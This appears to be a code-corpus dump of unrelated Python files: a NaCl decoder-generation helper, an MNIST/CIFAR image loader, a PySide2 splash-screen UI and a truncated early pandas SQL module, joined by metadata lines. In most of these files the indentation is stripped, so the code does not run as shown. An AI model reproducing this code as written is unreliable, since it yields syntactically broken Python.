NOT_TCB_BOILERPLATE="""#ifndef NACL_TRUSTED_BUT_NOT_TCB
#error This file is not meant for use in the TCB
#endif
"""
NEWLINE_STR="""
"""
COMMENTED_NEWLINE_STR="""
//"""
"""Adds comment '// ' string after newlines."""
def commented_string(str, indent=''):
sep = NEWLINE_STR + indent + '//'
str = str.replace(NEWLINE_STR, sep)
# This second line is a hack to fix that sometimes newlines are
# represented as '\n'.
# TODO(karl) Find the cause of this hack, and fix it.
return str.replace('\\n', sep)
def ifdef_name(filename):
""" Generates the ifdef name to use for the given filename"""
return filename.replace("/", "_").replace(".", "_").upper() + "_"
def GetNumberCodeBlocks(separators):
"""Gets the number of code blocks to break classes into."""
num_blocks = len(separators) + 1
assert num_blocks >= 2
return num_blocks
def FindBlockIndex(filename, format, num_blocks):
"""Returns true if the filename matches the format with an
index in the range [1, num_blocks]."""
for block in range(1, num_blocks+1):
suffix = format % block
if filename.endswith(suffix):
return block
raise Exception("Can't find block index: %s" % filename)
def GetDecodersBlock(n, separators, decoders, name_fcn):
"""Returns the (sorted) list of decoders to include
in block n, assuming decoders are split using
the list of separators."""
num_blocks = GetNumberCodeBlocks(separators)
assert n > 0 and n <= num_blocks
return [decoder for decoder in decoders
if ((n == 1
or IsPrefixLeDecoder(separators[n-2], decoder, name_fcn)) and
(n == num_blocks or
not IsPrefixLeDecoder(separators[n-1], decoder, name_fcn)))]
def IsPrefixLeDecoder(prefix, decoder, name_fcn):
"""Returns true if the prefix is less than or equal to the
corresponding prefix length of the decoder name."""
decoder_name = name_fcn(decoder)
prefix_len = len(prefix)
decoder_len = len(decoder_name)
decoder_prefix = (decoder_name[0:prefix_len]
if prefix_len < decoder_len
else decoder_name)
return prefix <= decoder_prefix
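# A small usage sketch (not part of the original file), using plain strings as stand-in
# decoders and the identity function as name_fcn.
if __name__ == '__main__':
  print(ifdef_name('src/trusted/validator_arm/gen/arm32_decode.h'))
  decoders = ['Add', 'Branch', 'Load', 'Store']
  separators = ['L']
  for block in range(1, GetNumberCodeBlocks(separators) + 1):
    print('block %d: %s' % (block, GetDecodersBlock(block, separators, decoders,
                                                    lambda d: d)))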
| 2.8125 | 3 |
src/data_loader/input_data_loader.py | ChristopherBrix/Debona | 2 | 1132 |
"""
Functions for loading input data.
Author: <NAME> <<EMAIL>>
"""
import os
import numpy as np
def load_img(path: str, img_nums: list, shape: tuple) -> np.array:
"""
    Loads images stored in the human-readable format.
Args:
path:
            The path to the folder with the mnist images.
img_nums:
A list with the numbers of the images we want to load.
shape:
The shape of a single image.
Returns:
        The images as a numpy array of shape (M, *shape).
"""
images = np.zeros((len(img_nums), *shape), dtype=float)
for idx, i in enumerate(img_nums):
file = os.path.join(path, "image" + str(i))
with open(file, "r") as f:
data = [float(pixel) for pixel in f.readlines()[0].split(",")[:-1]]
images[idx, :, :] = np.array(data).reshape(*shape)
return images
def load_mnist_human_readable(path: str, img_nums: list) -> np.array:
"""
    Loads mnist images from the neurify dataset.
Args:
path:
            The path to the folder with the mnist images.
img_nums:
A list with the numbers of the images we want to load.
Returns:
The images as a Mx28x28 numpy array.
"""
return load_img(path, img_nums, (28, 28))
def load_cifar10_human_readable(path: str, img_nums: list) -> np.array:
"""
Loads the Cifar10 images in human readable format.
Args:
path:
            The path to the folder with the Cifar10 images.
img_nums:
A list with the numbers of the images we want to load.
Returns:
The images as a Mx3x32x32 numpy array.
"""
return load_img(path, img_nums, (3, 32, 32))
def load_images_eran(img_csv: str = "../../resources/images/cifar10_test.csv", num_images: int = 100,
image_shape: tuple = (3, 32, 32)) -> tuple:
"""
Loads the images from the eran csv.
Args:
        img_csv:
            The path to the csv file.
        num_images:
            The number of images to load.
        image_shape:
            The shape of a single image.
Returns:
images, targets
"""
images_array = np.zeros((num_images, np.prod(image_shape)), dtype=np.float32)
targets_array = np.zeros(num_images, dtype=int)
with open(img_csv, "r") as file:
for j in range(num_images):
line_arr = file.readline().split(",")
targets_array[j] = int(line_arr[0])
images_array[j] = [float(pixel) for pixel in line_arr[1:]]
return images_array.reshape((num_images, *image_shape)), targets_array
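
# A minimal usage sketch (not part of the original module): it writes one fake "image0"
# file in the comma-separated format load_img expects and reads it back as a 1x2x2 array.
if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp_dir:
        with open(os.path.join(tmp_dir, "image0"), "w") as f:
            f.write("0.1,0.2,0.3,0.4,\n")
        print(load_img(tmp_dir, [0], (2, 2)).shape)  # (1, 2, 2)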
| 3.625 | 4 |
ui_splash_screen.py | hirokiyaginuma/scriptspinner-software | 0 | 1133 | <reponame>hirokiyaginuma/scriptspinner-software
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'splash_screen.ui'
##
## Created by: Qt User Interface Compiler version 5.15.1
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class Ui_Splash_Screen(object):
def setupUi(self, Splash_Screen):
if not Splash_Screen.objectName():
Splash_Screen.setObjectName(u"Splash_Screen")
Splash_Screen.resize(720, 425)
self.centralwidget = QWidget(Splash_Screen)
self.centralwidget.setObjectName(u"centralwidget")
self.verticalLayout = QVBoxLayout(self.centralwidget)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName(u"verticalLayout")
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.frame = QFrame(self.centralwidget)
self.frame.setObjectName(u"frame")
self.frame.setFrameShape(QFrame.StyledPanel)
self.frame.setFrameShadow(QFrame.Raised)
self.frame.setLineWidth(0)
self.label = QLabel(self.frame)
self.label.setObjectName(u"label")
self.label.setGeometry(QRect(0, 0, 720, 425))
self.label.setLineWidth(0)
self.label.setPixmap(QPixmap(u"img/SS_logo.jpg"))
self.label.setIndent(0)
self.progressBar = QProgressBar(self.frame)
self.progressBar.setObjectName(u"progressBar")
self.progressBar.setGeometry(QRect(70, 330, 591, 41))
self.progressBar.setStyleSheet(u"QProgressBar {\n"
" background-color:rgb(149, 165, 166);\n"
" border-style: none;\n"
" border-radius: 10px;\n"
" text-align: center;\n"
"}\n"
"QProgressBar::chunk {\n"
" border-radius: 10px;\n"
" background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(210, 157, 255, 255), stop:1 rgba(156, 69, 255, 255));\n"
"}")
self.progressBar.setValue(24)
self.verticalLayout.addWidget(self.frame)
Splash_Screen.setCentralWidget(self.centralwidget)
self.retranslateUi(Splash_Screen)
QMetaObject.connectSlotsByName(Splash_Screen)
# setupUi
def retranslateUi(self, Splash_Screen):
Splash_Screen.setWindowTitle(QCoreApplication.translate("Splash_Screen", u"MainWindow", None))
self.label.setText("")
# retranslateUi
| 2.203125 | 2 |
pandas/io/sql.py | danbirken/pandas | 0 | 1134 | <gh_stars>0
"""
Collection of query wrappers / abstractions to both facilitate data
retrieval and to reduce dependency on DB-specific API.
"""
from __future__ import print_function, division
from datetime import datetime, date, timedelta
import warnings
import traceback
import itertools
import re
import numpy as np
import pandas.core.common as com
from pandas.compat import lzip, map, zip, raise_with_traceback, string_types
from pandas.core.api import DataFrame, Series
from pandas.core.base import PandasObject
from pandas.tseries.tools import to_datetime
class SQLAlchemyRequired(ImportError):
pass
class DatabaseError(IOError):
pass
#------------------------------------------------------------------------------
# Helper functions
def _convert_params(sql, params):
"""convert sql and params args to DBAPI2.0 compliant format"""
args = [sql]
if params is not None:
if hasattr(params, 'keys'): # test if params is a mapping
args += [params]
else:
args += [list(params)]
return args
def _handle_date_column(col, format=None):
if isinstance(format, dict):
return to_datetime(col, **format)
else:
if format in ['D', 's', 'ms', 'us', 'ns']:
return to_datetime(col, coerce=True, unit=format)
elif issubclass(col.dtype.type, np.floating) or issubclass(col.dtype.type, np.integer):
# parse dates as timestamp
format = 's' if format is None else format
return to_datetime(col, coerce=True, unit=format)
else:
return to_datetime(col, coerce=True, format=format)
def _parse_date_columns(data_frame, parse_dates):
""" Force non-datetime columns to be read as such.
Supports both string formatted and integer timestamp columns
"""
# handle non-list entries for parse_dates gracefully
if parse_dates is True or parse_dates is None or parse_dates is False:
parse_dates = []
if not hasattr(parse_dates, '__iter__'):
parse_dates = [parse_dates]
for col_name in parse_dates:
df_col = data_frame[col_name]
try:
fmt = parse_dates[col_name]
except TypeError:
fmt = None
data_frame[col_name] = _handle_date_column(df_col, format=fmt)
return data_frame
def execute(sql, con, cur=None, params=None):
"""
Execute the given SQL query using the provided connection object.
Parameters
----------
sql : string
Query to be executed
con : SQLAlchemy engine or sqlite3 DBAPI2 connection
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
    cur : deprecated, cursor is obtained from connection
params : list or tuple, optional
List of parameters to pass to execute method.
Returns
-------
Results Iterable
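
    Examples
    --------
    A minimal, self-contained sketch using an in-memory SQLite connection (not part
    of the original docstring):

    >>> import sqlite3
    >>> conn = sqlite3.connect(':memory:')
    >>> _ = conn.executescript('CREATE TABLE t (a INTEGER); INSERT INTO t VALUES (1);')
    >>> execute('SELECT a FROM t', conn).fetchall()
    [(1,)]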
"""
if cur is None:
pandas_sql = pandasSQL_builder(con)
else:
pandas_sql = pandasSQL_builder(cur, is_cursor=True)
args = _convert_params(sql, params)
return pandas_sql.execute(*args)
#------------------------------------------------------------------------------
#--- Deprecated tquery and uquery
def _safe_fetch(cur):
try:
result = cur.fetchall()
if not isinstance(result, list):
result = list(result)
return result
except Exception as e: # pragma: no cover
excName = e.__class__.__name__
if excName == 'OperationalError':
return []
def tquery(sql, con=None, cur=None, retry=True):
"""
DEPRECATED. Returns list of tuples corresponding to each row in given sql
query.
If only one column selected, then plain list is returned.
To obtain the same result in the future, you can use the following:
>>> execute(sql, con, params).fetchall()
Parameters
----------
sql: string
SQL query to be executed
con: DBAPI2 connection
    cur: deprecated, cursor is obtained from connection
Returns
-------
Results Iterable
"""
warnings.warn(
"tquery is depreciated, and will be removed in future versions. "
"You can use ``execute(...).fetchall()`` instead.",
FutureWarning)
cur = execute(sql, con, cur=cur)
result = _safe_fetch(cur)
if con is not None:
try:
cur.close()
con.commit()
except Exception as e:
excName = e.__class__.__name__
if excName == 'OperationalError': # pragma: no cover
print('Failed to commit, may need to restart interpreter')
else:
raise
traceback.print_exc()
if retry:
return tquery(sql, con=con, retry=False)
if result and len(result[0]) == 1:
# python 3 compat
result = list(lzip(*result)[0])
elif result is None: # pragma: no cover
result = []
return result
def uquery(sql, con=None, cur=None, retry=True, params=None):
"""
DEPRECATED. Does the same thing as tquery, but instead of returning results, it
returns the number of rows affected. Good for update queries.
To obtain the same result in the future, you can use the following:
>>> execute(sql, con).rowcount
Parameters
----------
sql: string
SQL query to be executed
con: DBAPI2 connection
    cur: deprecated, cursor is obtained from connection
params: list or tuple, optional
List of parameters to pass to execute method.
Returns
-------
Number of affected rows
"""
warnings.warn(
"uquery is depreciated, and will be removed in future versions. "
"You can use ``execute(...).rowcount`` instead.",
FutureWarning)
cur = execute(sql, con, cur=cur, params=params)
result = cur.rowcount
try:
con.commit()
except Exception as e:
excName = e.__class__.__name__
if excName != 'OperationalError':
raise
traceback.print_exc()
if retry:
print('Looks like your connection failed, reconnecting...')
return uquery(sql, con, retry=False)
return result
#------------------------------------------------------------------------------
#--- Read and write to DataFrames
def read_sql_table(table_name, con, index_col=None, coerce_float=True,
parse_dates=None, columns=None):
"""Read SQL database table into a DataFrame.
Given a table name and an SQLAlchemy engine, returns a DataFrame.
This function does not support DBAPI connections.
Parameters
----------
table_name : string
Name of SQL table in database
con : SQLAlchemy engine
        Sqlite DBAPI connection mode not supported
index_col : string, optional
Column to set as index
coerce_float : boolean, default True
Attempt to convert values to non-string, non-numeric objects (like
decimal.Decimal) to floating point. Can result in loss of Precision.
parse_dates : list or dict
- List of column names to parse as dates
- Dict of ``{column_name: format string}`` where format string is
strftime compatible in case of parsing string times or is one of
(D, s, ns, ms, us) in case of parsing integer timestamps
- Dict of ``{column_name: arg dict}``, where the arg dict corresponds
to the keyword arguments of :func:`pandas.to_datetime`
Especially useful with databases without native Datetime support,
such as SQLite
columns : list
List of column names to select from sql table
Returns
-------
DataFrame
See also
--------
read_sql_query : Read SQL query into a DataFrame.
read_sql
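
    Examples
    --------
    A sketch (not part of the original docstring); it assumes SQLAlchemy is installed
    and that the database behind ``engine`` contains a table named ``'my_table'``:

    >>> from sqlalchemy import create_engine        # doctest: +SKIP
    >>> engine = create_engine('sqlite:///my.db')   # doctest: +SKIP
    >>> df = read_sql_table('my_table', engine)     # doctest: +SKIP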
"""
pandas_sql = PandasSQLAlchemy(con)
table = pandas_sql.read_table(
table_name, index_col=index_col, coerce_float=coerce_float,
parse_dates=parse_dates, columns=columns)
if table is not None:
return table
else:
raise ValueError("Table %s not found" % table_name, con)
def read_sql_query(sql, con, index_col=None, coerce_float=True, params=None,
parse_dates=None):
"""Read SQL query into a DataFrame.
Returns a DataFrame corresponding to the result set of the query
string. Optionally provide an `index_col` parameter to use one of the
columns as the index, otherwise default integer index will be used.
Parameters
----------
sql : string
SQL query to be executed
con : SQLAlchemy engine or sqlite3 DBAPI2 connection
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
index_col : string, optional
Column name to use as index for the returned DataFrame object.
coerce_float : boolean, default True
Attempt to convert values to non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets
params : list, tuple or dict, optional
List of parameters to pass to execute method.
parse_dates : list or dict
- List of column names to parse as dates
- Dict of ``{column_name: format string}`` where format string is
strftime compatible in case of parsing string times or is one of
(D, s, ns, ms, us) in case of parsing integer timestamps
- Dict of ``{column_name: arg dict}``, where the arg dict corresponds
to the keyword arguments of :func:`pandas.to_datetime`
Especially useful with databases without native Datetime support,
such as SQLite
Returns
-------
DataFrame
See also
--------
read_sql_table : Read SQL database table into a DataFrame
read_sql
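
    Examples
    --------
    A minimal, self-contained sketch using an in-memory SQLite connection (not part
    of the original docstring):

    >>> import sqlite3
    >>> conn = sqlite3.connect(':memory:')
    >>> _ = conn.executescript('CREATE TABLE t (a INTEGER); INSERT INTO t VALUES (1); INSERT INTO t VALUES (2);')
    >>> len(read_sql_query('SELECT a FROM t', conn))
    2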
"""
pandas_sql = pandasSQL_builder(con)
return pandas_sql.read_sql(
sql, index_col=index_col, params=params, coerce_float=coerce_float,
parse_dates=parse_dates)
def read_sql(sql, con, index_col=None, coerce_float=True, params=None,
parse_dates=None, columns=None):
"""
Read SQL query or database table into a DataFrame.
Parameters
----------
sql : string
SQL query to be executed or database table name.
con : SQLAlchemy engine or DBAPI2 connection (legacy mode)
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
index_col : string, optional
column name to use as index for the returned DataFrame object.
coerce_float : boolean, default True
Attempt to convert values to non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets
params : list, tuple or dict, optional
List of parameters to pass to execute method.
parse_dates : list or dict
- List of column names to parse as dates
- Dict of ``{column_name: format string}`` where format string is
strftime compatible in case of parsing string times or is one of
(D, s, ns, ms, us) in case of parsing integer timestamps
- Dict of ``{column_name: arg dict}``, where the arg dict corresponds
to the keyword arguments of :func:`pandas.to_datetime`
Especially useful with databases without native Datetime support,
such as SQLite
columns : list
List of column names to select from sql table (only used when reading
a table).
Returns
-------
DataFrame
Notes
-----
This function is a convenience wrapper around ``read_sql_table`` and
``read_sql_query`` (and for backward compatibility) and will delegate
to the specific function depending on the provided input (database
table name or sql query).
See also
--------
read_sql_table : Read SQL database table into a DataFrame
read_sql_query : Read SQL query into a DataFrame
"""
pandas_sql = pandasSQL_builder(con)
if isinstance(pandas_sql, PandasSQLLegacy):
return pandas_sql.read_sql(
sql, index_col=index_col, params=params,
coerce_float=coerce_float, parse_dates=parse_dates)
if pandas_sql.has_table(sql):
return pandas_sql.read_table(
sql, index_col=index_col, coerce_float=coerce_float,
parse_dates=parse_dates, columns=columns)
else:
return pandas_sql.read_sql(
sql, index_col=index_col, params=params,
coerce_float=coerce_float, parse_dates=parse_dates)
def to_sql(frame, name, con, flavor='sqlite', if_exists='fail', index=True,
index_label=None):
"""
Write records stored in a DataFrame to a SQL database.
Parameters
----------
frame : DataFrame
name : string
Name of SQL table
con : SQLAlchemy engine or sqlite3 DBAPI2 connection
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
flavor : {'sqlite', 'mysql'}, default 'sqlite'
The flavor of SQL to use. Ignored when using SQLAlchemy engine.
'mysql' is deprecated and will be removed in future versions, but it
will be further supported through SQLAlchemy engines.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
- fail: If table exists, do nothing.
- replace: If table exists, drop it, recreate it, and insert data.
- append: If table exists, insert data. Create if does not exist.
index : boolean, default True
Write DataFrame index as a column
index_label : string or sequence, default None
Column label for index column(s). If None is given (default) and
`index` is True, then the index names are used.
A sequence should be given if the DataFrame uses MultiIndex.
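
    Examples
    --------
    A minimal, self-contained sketch using an in-memory SQLite connection (not part
    of the original docstring):

    >>> import sqlite3
    >>> conn = sqlite3.connect(':memory:')
    >>> to_sql(DataFrame({'a': [1, 2]}), 'demo', conn, flavor='sqlite')
    >>> read_sql('SELECT * FROM demo', conn).shape
    (2, 2)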
"""
if if_exists not in ('fail', 'replace', 'append'):
raise ValueError("'{0}' is not valid for if_exists".format(if_exists))
pandas_sql = pandasSQL_builder(con, flavor=flavor)
if isinstance(frame, Series):
frame = frame.to_frame()
elif not isinstance(frame, DataFrame):
raise NotImplementedError
pandas_sql.to_sql(frame, name, if_exists=if_exists, index=index,
index_label=index_label)
def has_table(table_name, con, flavor='sqlite'):
"""
Check if DataBase has named table.
Parameters
----------
table_name: string
Name of SQL table
con: SQLAlchemy engine or sqlite3 DBAPI2 connection
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
flavor: {'sqlite', 'mysql'}, default 'sqlite'
The flavor of SQL to use. Ignored when using SQLAlchemy engine.
'mysql' is deprecated and will be removed in future versions, but it
will be further supported through SQLAlchemy engines.
Returns
-------
boolean
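
    Examples
    --------
    A minimal sketch (not part of the original docstring):

    >>> import sqlite3
    >>> has_table('missing', sqlite3.connect(':memory:'))
    False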
"""
pandas_sql = pandasSQL_builder(con, flavor=flavor)
return pandas_sql.has_table(table_name)
table_exists = has_table
_MYSQL_WARNING = ("The 'mysql' flavor with DBAPI connection is deprecated "
"and will be removed in future versions. "
"MySQL will be further supported with SQLAlchemy engines.")
def pandasSQL_builder(con, flavor=None, meta=None, is_cursor=False):
"""
Convenience function to return the correct PandasSQL subclass based on the
provided parameters
"""
# When support for DBAPI connections is removed,
# is_cursor should not be necessary.
try:
import sqlalchemy
if isinstance(con, sqlalchemy.engine.Engine):
return PandasSQLAlchemy(con, meta=meta)
else:
if flavor == 'mysql':
warnings.warn(_MYSQL_WARNING, FutureWarning)
return PandasSQLLegacy(con, flavor, is_cursor=is_cursor)
except ImportError:
if flavor == 'mysql':
warnings.warn(_MYSQL_WARNING, FutureWarning)
return PandasSQLLegacy(con, flavor, is_cursor=is_cursor)
class PandasSQLTable(PandasObject):
"""
For mapping Pandas tables to SQL tables.
    Uses the fact that the table is reflected by SQLAlchemy to
    do better type conversions.
Also holds various flags needed to avoid having to
pass them between functions all the time.
"""
# TODO: support for multiIndex
def __init__(self, name, pandas_sql_engine, frame=None, index=True,
if_exists='fail', prefix='pandas', index_label=None):
self.name = name
self.pd_sql = pandas_sql_engine
self.prefix = prefix
self.frame = frame
self.index = self._index_name(index, index_label)
if frame is not None:
# We want to write a frame
if self.pd_sql.has_table(self.name):
if if_exists == 'fail':
raise ValueError("Table '%s' already exists." % name)
elif if_exists == 'replace':
self.pd_sql.drop_table(self.name)
self.table = self._create_table_statement()
self.create()
elif if_exists == 'append':
self.table = self.pd_sql.get_table(self.name)
if self.table is None:
self.table = self._create_table_statement()
else:
raise ValueError(
"'{0}' is not valid for if_exists".format(if_exists))
else:
self.table = self._create_table_statement()
self.create()
else:
# no data provided, read-only mode
self.table = self.pd_sql.get_table(self.name)
if self.table is None:
raise ValueError("Could not init table '%s'" % name)
def exists(self):
return self.pd_sql.has_table(self.name)
def sql_schema(self):
from sqlalchemy.schema import CreateTable
return str(CreateTable(self.table))
def create(self):
self.table.create()
def insert_statement(self):
return self.table.insert()
def maybe_asscalar(self, i):
try:
return np.asscalar(i)
except AttributeError:
return i
def insert_data(self):
if self.index is not None:
temp = self.frame.copy()
temp.index.names = self.index
try:
temp.reset_index(inplace=True)
except ValueError as err:
raise ValueError(
"duplicate name in index/columns: {0}".format(err))
else:
temp = self.frame
return temp
def insert(self):
ins = self.insert_statement()
data_list = []
temp = self.insert_data()
keys = temp.columns
for t in temp.itertuples():
data = dict((k, self.maybe_asscalar(v))
for k, v in zip(keys, t[1:]))
data_list.append(data)
self.pd_sql.execute(ins, data_list)
def read(self, coerce_float=True, parse_dates=None, columns=None):
if columns is not None and len(columns) > 0:
from sqlalchemy import select
cols = [self.table.c[n] for n in columns]
if self.index is not None:
[cols.insert(0, self.table.c[idx]) for idx in self.index[::-1]]
sql_select = select(cols)
else:
sql_select = self.table.select()
result = self.pd_sql.execute(sql_select)
data = result.fetchall()
column_names = result.keys()
self.frame = DataFrame.from_records(
data, columns=column_names, coerce_float=coerce_float)
self._harmonize_columns(parse_dates=parse_dates)
if self.index is not None:
self.frame.set_index(self.index, inplace=True)
return self.frame
def _index_name(self, index, index_label):
# for writing: index=True to include index in sql table
if index is True:
nlevels = self.frame.index.nlevels
# if index_label is specified, set this as index name(s)
if index_label is not None:
if not isinstance(index_label, list):
index_label = [index_label]
if len(index_label) != nlevels:
raise ValueError(
"Length of 'index_label' should match number of "
"levels, which is {0}".format(nlevels))
else:
return index_label
# return the used column labels for the index columns
if nlevels == 1 and 'index' not in self.frame.columns and self.frame.index.name is None:
return ['index']
else:
return [l if l is not None else "level_{0}".format(i)
for i, l in enumerate(self.frame.index.names)]
# for reading: index=(list of) string to specify column to set as index
elif isinstance(index, string_types):
return [index]
elif isinstance(index, list):
return index
else:
return None
def _create_table_statement(self):
from sqlalchemy import Table, Column
columns = list(map(str, self.frame.columns))
column_types = map(self._sqlalchemy_type, self.frame.dtypes)
columns = [Column(name, typ)
for name, typ in zip(columns, column_types)]
if self.index is not None:
for i, idx_label in enumerate(self.index[::-1]):
idx_type = self._sqlalchemy_type(
self.frame.index.get_level_values(i))
columns.insert(0, Column(idx_label, idx_type, index=True))
return Table(self.name, self.pd_sql.meta, *columns)
def _harmonize_columns(self, parse_dates=None):
""" Make a data_frame's column type align with an sql_table
column types
Need to work around limited NA value support.
Floats are always fine, ints must always
be floats if there are Null values.
Booleans are hard because converting bool column with None replaces
all Nones with false. Therefore only convert bool if there are no
NA values.
Datetimes should already be converted
to np.datetime if supported, but here we also force conversion
if required
"""
# handle non-list entries for parse_dates gracefully
if parse_dates is True or parse_dates is None or parse_dates is False:
parse_dates = []
if not hasattr(parse_dates, '__iter__'):
parse_dates = [parse_dates]
for sql_col in self.table.columns:
col_name = sql_col.name
try:
df_col = self.frame[col_name]
# the type the dataframe column should have
col_type = self._numpy_type(sql_col.type)
if col_type is datetime or col_type is date:
if not issubclass(df_col.dtype.type, np.datetime64):
self.frame[col_name] = _handle_date_column(df_col)
elif col_type is float:
# floats support NA, can always convert!
self.frame[col_name].astype(col_type, copy=False)
elif len(df_col) == df_col.count():
# No NA values, can convert ints and bools
if col_type is int or col_type is bool:
self.frame[col_name].astype(col_type, copy=False)
# Handle date parsing
if col_name in parse_dates:
try:
fmt = parse_dates[col_name]
except TypeError:
fmt = None
self.frame[col_name] = _handle_date_column(
df_col, format=fmt)
except KeyError:
pass # this column not in results
def _sqlalchemy_type(self, arr_or_dtype):
from sqlalchemy.types import Integer, Float, Text, Boolean, DateTime, Date, Interval
if arr_or_dtype is date:
return Date
if com.is_datetime64_dtype(arr_or_dtype):
try:
tz = arr_or_dtype.tzinfo
return DateTime(timezone=True)
except:
return DateTime
if com.is_timedelta64_dtype(arr_or_dtype):
warnings.warn("the 'timedelta' type is not supported, and will be "
"written as integer values (ns frequency) to the "
"database.", UserWarning)
return Integer
elif com.is_float_dtype(arr_or_dtype):
return Float
elif com.is_integer_dtype(arr_or_dtype):
# TODO: Refine integer size.
return Integer
elif com.is_bool(arr_or_dtype):
return Boolean
return Text
def _numpy_type(self, sqltype):
from sqlalchemy.types import Integer, Float, Boolean, DateTime, Date
if isinstance(sqltype, Float):
return float
if isinstance(sqltype, Integer):
# TODO: Refine integer size.
return int
if isinstance(sqltype, DateTime):
# Caution: np.datetime64 is also a subclass of np.number.
return datetime
if isinstance(sqltype, Date):
return date
if isinstance(sqltype, Boolean):
return bool
return object
class PandasSQL(PandasObject):
"""
Subclasses Should define read_sql and to_sql
"""
def read_sql(self, *args, **kwargs):
raise ValueError(
"PandasSQL must be created with an SQLAlchemy engine or connection+sql flavor")
def to_sql(self, *args, **kwargs):
raise ValueError(
"PandasSQL must be created with an SQLAlchemy engine or connection+sql flavor")
class PandasSQLAlchemy(PandasSQL):
"""
    This class enables conversion between DataFrame and SQL databases
using SQLAlchemy to handle DataBase abstraction
"""
def __init__(self, engine, meta=None):
self.engine = engine
if not meta:
from sqlalchemy.schema import MetaData
meta = MetaData(self.engine)
meta.reflect(self.engine)
self.meta = meta
def execute(self, *args, **kwargs):
"""Simple passthrough to SQLAlchemy engine"""
return self.engine.execute(*args, **kwargs)
def read_table(self, table_name, index_col=None, coerce_float=True,
parse_dates=None, columns=None):
table = PandasSQLTable(table_name, self, index=index_col)
return table.read(coerce_float=coerce_float,
parse_dates=parse_dates, columns=columns)
def read_sql(self, sql, index_col=None, coerce_float=True,
parse_dates=None, params=None):
args = _convert_params(sql, params)
result = self.execute(*args)
data = result.fetchall()
columns = result.keys()
data_frame = DataFrame.from_records(
data, columns=columns, coerce_float=coerce_float)
_parse_date_columns(data_frame, parse_dates)
if index_col is not None:
data_frame.set_index(index_col, inplace=True)
return data_frame
def to_sql(self, frame, name, if_exists='fail', index=True,
index_label=None):
table = PandasSQLTable(
name, self, frame=frame, index=index, if_exists=if_exists,
index_label=index_label)
table.insert()
@property
def tables(self):
return self.meta.tables
def has_table(self, name):
if self.meta.tables.get(name) is not None:
return True
else:
return False
def get_table(self, table_name):
return self.meta.tables.get(table_name)
def drop_table(self, table_name):
if self.engine.has_table(table_name):
self.get_table(table_name).drop()
self.meta.clear()
self.meta.reflect()
def _create_sql_schema(self, frame, table_name):
table = PandasSQLTable(table_name, self, frame=frame)
return str(table.sql_schema())
# ---- SQL without SQLAlchemy ---
# Flavour specific sql strings and handler class for access to DBs without
# SQLAlchemy installed
# SQL type convertions for each DB
_SQL_TYPES = {
'text': {
'mysql': 'VARCHAR (63)',
'sqlite': 'TEXT',
},
'float': {
'mysql': 'FLOAT',
'sqlite': 'REAL',
},
'int': {
'mysql': 'BIGINT',
'sqlite': 'INTEGER',
},
'datetime': {
'mysql': 'DATETIME',
'sqlite': 'TIMESTAMP',
},
'date': {
'mysql': 'DATE',
'sqlite': 'TIMESTAMP',
},
'bool': {
'mysql': 'BOOLEAN',
'sqlite': 'INTEGER',
}
}
# SQL enquote and wildcard symbols
_SQL_SYMB = {
'mysql': {
'br_l': '`',
'br_r': '`',
'wld': '%s'
},
'sqlite': {
'br_l': '[',
'br_r': ']',
'wld': '?'
}
}
_SAFE_NAMES_WARNING = ("The spaces in these column names will not be changed. "
"In pandas versions < 0.14, spaces were converted to "
"underscores.")
class PandasSQLTableLegacy(PandasSQLTable):
"""Patch the PandasSQLTable for legacy support.
Instead of a table variable just use the Create Table
statement"""
def sql_schema(self):
return str(self.table)
def create(self):
self.pd_sql.execute(self.table)
def insert_statement(self):
names = list(map(str, self.frame.columns))
flv = self.pd_sql.flavor
br_l = _SQL_SYMB[flv]['br_l'] # left val quote char
br_r = _SQL_SYMB[flv]['br_r'] # right val quote char
wld = _SQL_SYMB[flv]['wld'] # wildcard char
if self.index is not None:
[names.insert(0, idx) for idx in self.index[::-1]]
bracketed_names = [br_l + column + br_r for column in names]
col_names = ','.join(bracketed_names)
wildcards = ','.join([wld] * len(names))
insert_statement = 'INSERT INTO %s (%s) VALUES (%s)' % (
self.name, col_names, wildcards)
return insert_statement
def insert(self):
ins = self.insert_statement()
temp = self.insert_data()
data_list = []
for t in temp.itertuples():
data = tuple((self.maybe_asscalar(v) for v in t[1:]))
data_list.append(data)
cur = self.pd_sql.con.cursor()
cur.executemany(ins, data_list)
cur.close()
self.pd_sql.con.commit()
def _create_table_statement(self):
"Return a CREATE TABLE statement to suit the contents of a DataFrame."
columns = list(map(str, self.frame.columns))
        pat = re.compile(r'\s+')
if any(map(pat.search, columns)):
warnings.warn(_SAFE_NAMES_WARNING)
column_types = [self._sql_type_name(typ) for typ in self.frame.dtypes]
if self.index is not None:
for i, idx_label in enumerate(self.index[::-1]):
columns.insert(0, idx_label)
column_types.insert(0, self._sql_type_name(self.frame.index.get_level_values(i).dtype))
flv = self.pd_sql.flavor
br_l = _SQL_SYMB[flv]['br_l'] # left val quote char
br_r = _SQL_SYMB[flv]['br_r'] # right val quote char
col_template = br_l + '%s' + br_r + ' %s'
columns = ',\n '.join(col_template %
x for x in zip(columns, column_types))
template = """CREATE TABLE %(name)s (
%(columns)s
)"""
create_statement = template % {'name': self.name, 'columns': columns}
return create_statement
def _sql_type_name(self, dtype):
pytype = dtype.type
pytype_name = "text"
if issubclass(pytype, np.floating):
pytype_name = "float"
elif com.is_timedelta64_dtype(pytype):
warnings.warn("the 'timedelta' type is not supported, and will be "
"written as integer values (ns frequency) to the "
"database.", UserWarning)
pytype_name = "int"
elif issubclass(pytype, np.integer):
pytype_name = "int"
